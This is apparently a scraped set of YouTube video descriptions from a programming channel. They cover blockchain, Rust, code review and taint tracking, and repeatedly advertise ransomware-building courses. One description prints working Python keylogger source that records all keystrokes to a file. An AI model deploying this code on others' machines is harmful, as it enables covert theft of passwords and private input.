A tree whose elements have at most 2 children is called a binary tree. Since each element in a binary tree can have only 2 children, we typically name them the left and right child. This data structure has a wide range of real-world applications in Computer Science and Software Engineering. For instance, in many search applications where data is constantly entering/leaving, such as the map and set objects in many languages' libraries, high-bandwidth routers for storing router-tables, and in compilers to parse expressions. ... https://www.youtube.com/watch?v=E_8FCzc8vzk
This video teaches how to create a super simple Blockchain App in Java:
GitHub Link for the code: https://github.com/mohammadreza-ashouri/heapzip_blockchainapp
My Ransomware Design Course: https://www.udemy.com/course/how-to-make-a-cross-platform-ransomware-in-java-step-by-step/
Learn to analyze malware by making them like a pro!
https://www.udemy.com/course/malware-design-and-analysis/
Donation:
BTC: 1NkPEYsRfqrRnLngjpnnJuZ4qwu1inNQbW
ETH: 0x08b1833fc28a4e49f0eba23a0c9d4e179d88a42a
USDT: TRGCzQpRfJaiTCyjdwproYbEsvN8pCitGo
XMR: 8ACvnJnRn7HK3QyAGwULGieJ834udjVTvYNzHpHeS7ZcXjyLTX1yze4SwNMcg3ZgXZNdafJh7fcxwFhYoUns11AkFRsuzyn
DOGE: DGp4GbQLzprmtbdqNcWR6xRBdd1DDafMkn
My web page: http://ashoury.net
My Twitter: https://twitter.com/ashourics
...
https://www.youtube.com/watch?v=X0v5fN9QPU8
Do you like to learn how to create cross-platform ransomware in Java and protect yourself?
Find my full course here:
https://www.udemy.com/course/how-to-make-a-cross-platform-ransomware-in-java-step-by-step/
Learn to analyze malware by making them like a pro!
https://www.udemy.com/course/malware-design-and-analysis/
If you like this video, please give it a like, and subscribe to my channel.
Please also follow me on Twitter and following links:
https://d.tube/#!/c/heapzipchannel99
https://twitter.com/ashourics
https://www.instagram.com/heapzip/
https://ashourics.medium.com/
https://securecontract.io/
Or buying by crypto? http://hackerburg.io
--------------
Hey guys,
In this quick video, I show you how to build your own ransomware [malware] in Java in a few lines of code. You also get some idea how is the structure of ransomware in general and how you can analyze or perform reverse-engineering on them. Do not forget to subscribe to this channel and feel free to write you comment to me :)
Webpage: http://ashoury.net
Blog: http://ashoury.de/blog.html
Twitter: https://twitter.com/ZipHeap
https://www.linkedin.com/in/dr-mohammadreza-ashouri-072280207/
Supporting me by buying goodies: https://teespring.com/stores/symbol-art
## Contact
Feel free to leave a comment or contact us at ashoury@protonmail.com for any issues or suggestions!
Buy me a coffee ☕:
(BTC, BTC network): 1NkPEYsRfqrRnLngjpnnJuZ4qwu1inNQbW
(USDT, ERC20): 0x08b1833fc28a4e49f0eba23a0c9d4e179d88a42a
(ETH, ERC20): 0x08b1833fc28a4e49f0eba23a0c9d4e179d88a42a
My web page: http://ashoury.net
My Twitter: https://twitter.com/ZipHeap
If you like this video, please subscribe, and if you can support me by a little donation:
Buy a cool hoodie:
https://teespring.com/science-einstein-fun?pid=377&cid=100069
or a cool shirt:
https://teespring.com/fraternal-kiss?pid=823&cid=103662
or a cool mug!!!
https://teespring.com/fraternal-kiss?pid=659
If you like this video, please subscribe, and if you can support me by a little donation:
paypal.me/moashouri
Bitcoin: 3NjN8pTrDArSErzdT5Y2eHS7ufBZsu3xbE
https://www.buymeacoffee.com/heapzip
...
https://www.youtube.com/watch?v=PdNQU8wVV2A
Do you like to learn how to create cross-platform ransomware in Java and protect yourself?
Find my full course here:
https://www.udemy.com/course/how-to-make-a-cross-platform-ransomware-in-java-step-by-step/
or buy via crypto?
http://hackerburg.io
Hi, in this video I will show you how to create a minimalistic Python keylogger in 8 lines. If you like the content, please subscribe to my channel and support me.
Cool, hacking style T-Shirt?
https://teespring.com/stores/symbol-art
Ok, now the source code:
------------------------
from pynput.keyboard import Key, Listener
import logging
log_dir = ""
logging.basicConfig(filename=(log_dir + "keylogs.txt"), \
level=logging.DEBUG, format='%(asctime)s: %(message)s')
def on_press(key):
logging.info(str(key))
with Listener(on_press=on_press) as listener:
listener.join()
...
https://www.youtube.com/watch?v=FR5cUEyWt-U
Course: How to Create Ransomware and Protect in Java for Fun but not Profit!
Find my course here:
http://hackerburg.io
Hi folks,
This short tutorial details how to perform code review (static analysis) on a basic java code to find security vulnerabilities (code injection) in Java.
In this quick tutorial, I will show you code injection vulnerability in Java and how to detect this bug without using any tools. Furthermore, I will show you how to install and use "FindBugs" and default code analyzer in the IntelliJ IDE.
If you like this video, please subscribe, and if you can support me by a little donation:
Donation:
Bitcoin: 3NjN8pTrDArSErzdT5Y2eHS7ufBZsu3xbE
https://www.buymeacoffee.com/heapzip
-------------------------------------------------------------------------------------
* "Code review is a software quality assurance activity in which one or several people check a program mainly by viewing and reading parts of its source code"
* "Java is a general-purpose programming language that is class-based, object-oriented, and designed to have as few implementation dependencies as possible."
* "Code injection is the exploitation of a computer bug that is caused by processing invalid data. An injection is used by an attacker to introduce (or "inject") code into a vulnerable computer program and change the course of execution"
Wikipedia
-------------------------------------------------------------------------------------
If you find this video helpful, please do not forget to give it a like and subscribe to this channel. This encourages me to create useful content and share them here with you guys!
If you need specific help or you have any programming project just drop me an email: science.researcher1990@gmail.com
https://persimmonweb.com
https://ashoury.de
...
https://www.youtube.com/watch?v=R0koMEbuubw
Do you like to learn how to create cross-platform ransomware in Java and protect yourself?
Find my full course here:
https://www.udemy.com/course/how-to-make-a-cross-platform-ransomware-in-java-step-by-step/
or buy via crypto?
http://hackerburg.io
Learn to analyze malware by making them like a pro!
https://www.udemy.com/course/malware-design-and-analysis/
In this easy tutorial, I teach you how to create a prank virus in Java with the help of the Swing land KeyEvent libraries.
*Swing is a GUI widget toolkit for Java
*KeyEvent is a public class that extends InputEvent. An event that indicates that a keystroke occurred in a component.
To support the channel, please subscribe and if you like buy one of these cool style shirts or hoodies:
https://teespring.com/science-einstein-fun?pid=377
https://teespring.com/we-are-the-masters-of-our-fate?pid=395&cid=6622
https://teespring.com/fraternal-kiss?pid=823&cid=103662
https://teespring.com/white-fraternal-kiss?pid=389&cid=100019
...
https://www.youtube.com/watch?v=kYTqBYCHBeY
Hi HeapZip community! ?
In this video, I'll talk about a big challenge in the blockchain world: the 24K-byte size limit for Ethereum smart contracts. If you're building large-scale dapps, you might know the struggle of having a smart contract that's too big. But don't worry; in this video, I'll share easy-to-understand solutions to make those big contracts fit within the size limit.
A bit about me: I have a PhD in Computer Science and years of experience as a software engineer and blockchain expert. I've seen and solved many blockchain challenges, and I'm here to share my knowledge with you.
Special thanks to Srinivas Addugula for making this video look great with his editing skills. If you need a top-notch graphic designer, he's your guy! You can reach him at srinivasberlin@gmail.com.
Want to know more about me and my work?
? Medium: https://ashourics.medium.com
? My Website: https://ashoury.net
? Twitter: Follow @ashourics
? LinkedIn: https://www.linkedin.com/in/drashouri
? GitHub: https://github.com/mohammadreza-ashouri
If this video helps you, please consider supporting me with a small crypto donation. Every bit helps me make more content for you all!
(Ethereum Wallet: 0x974a14dFE57AfC90CDa58B70971FCbc3C598DDc6)
#SmartContracts #Ethereum #Solidity #optimization #DappProblems #HeapZip #BlockchainBasics #evm #smartcontracts
...
https://www.youtube.com/watch?v=AnYFnKWPZ0c
Hey folks,
In this series, I will teach you how to create your own blockchain in Rust without using any SDKs.
This video is part 1, which includes the fundamental functions and data structures for making your own blockchain in Rust.
In the next video, I will teach you how to add the mining functions.
If you like this video, please do not forget to subscribe and follow my channel.
Please also follow me on Twitter and the following links:
https://d.tube/#!/c/heapzipchannel99
https://twitter.com/ashourics
https://www.instagram.com/heapzip/
https://ashourics.medium.com/
https://securecontract.io/
## Contact
Email: ashourics@protonmail.com
GitHub: https://github.com/mohammadreza-ashouri/
Web: http://ashoury.net
Feel free to leave a comment or contact us at ashourics@gmail.com for any issues or suggestions!
Buy me a coffee ☕:
(BTC, BTC network): 1NkPEYsRfqrRnLngjpnnJuZ4qwu1inNQbW
(USDT, ERC20): 0x08b1833fc28a4e49f0eba23a0c9d4e179d88a42a
(ETH, ERC20): 0x08b1833fc28a4e49f0eba23a0c9d4e179d88a42a
(NEAR) ashouri.near
-----------------------------------------------
If you like to learn more about Ransomware, you can subscribe to my course:
https://www.udemy.com/course/how-to-make-a-cross-platform-ransomware-in-java-step-by-step/
If you like to learn about the reverse engineering of malware :
https://www.udemy.com/course/malware-design-and-analysis/
...
https://www.youtube.com/watch?v=NAmtJBiyW_I
#rust #optimization #binary
By default, the Rust compiler does not generate optimized binaries, which is vital for the wide spectrum of applications. In this video I show you some tips and tricks to optimize your binaries in Rust.
Do not forget to subscribe and follow me:
#Contact: ashourics@protonmail.com
https://github.com/mohammadreza-ashouri/
https://ashourics.medium.com/
https://twitter.com/ashourics
https://www.linkedin.com/in/drashouri/
https://ashoury.net/
https://odysee.com/@heapzip
https://d.tube/#!/c/heapzipchannel99
...
https://www.youtube.com/watch?v=aHE8a5-4fow
Hi folks,
In this video, I explained the theory of taint tracking for vulnerability finding and program security fuzzing. It is a simple and quick presentation introducing the pros and cons of dynamic taint tracking in particular.
I hope you like it. Please do not forget to support the channel by following options :)
Cheers!
...
https://www.youtube.com/watch?v=htd-b9-cdQo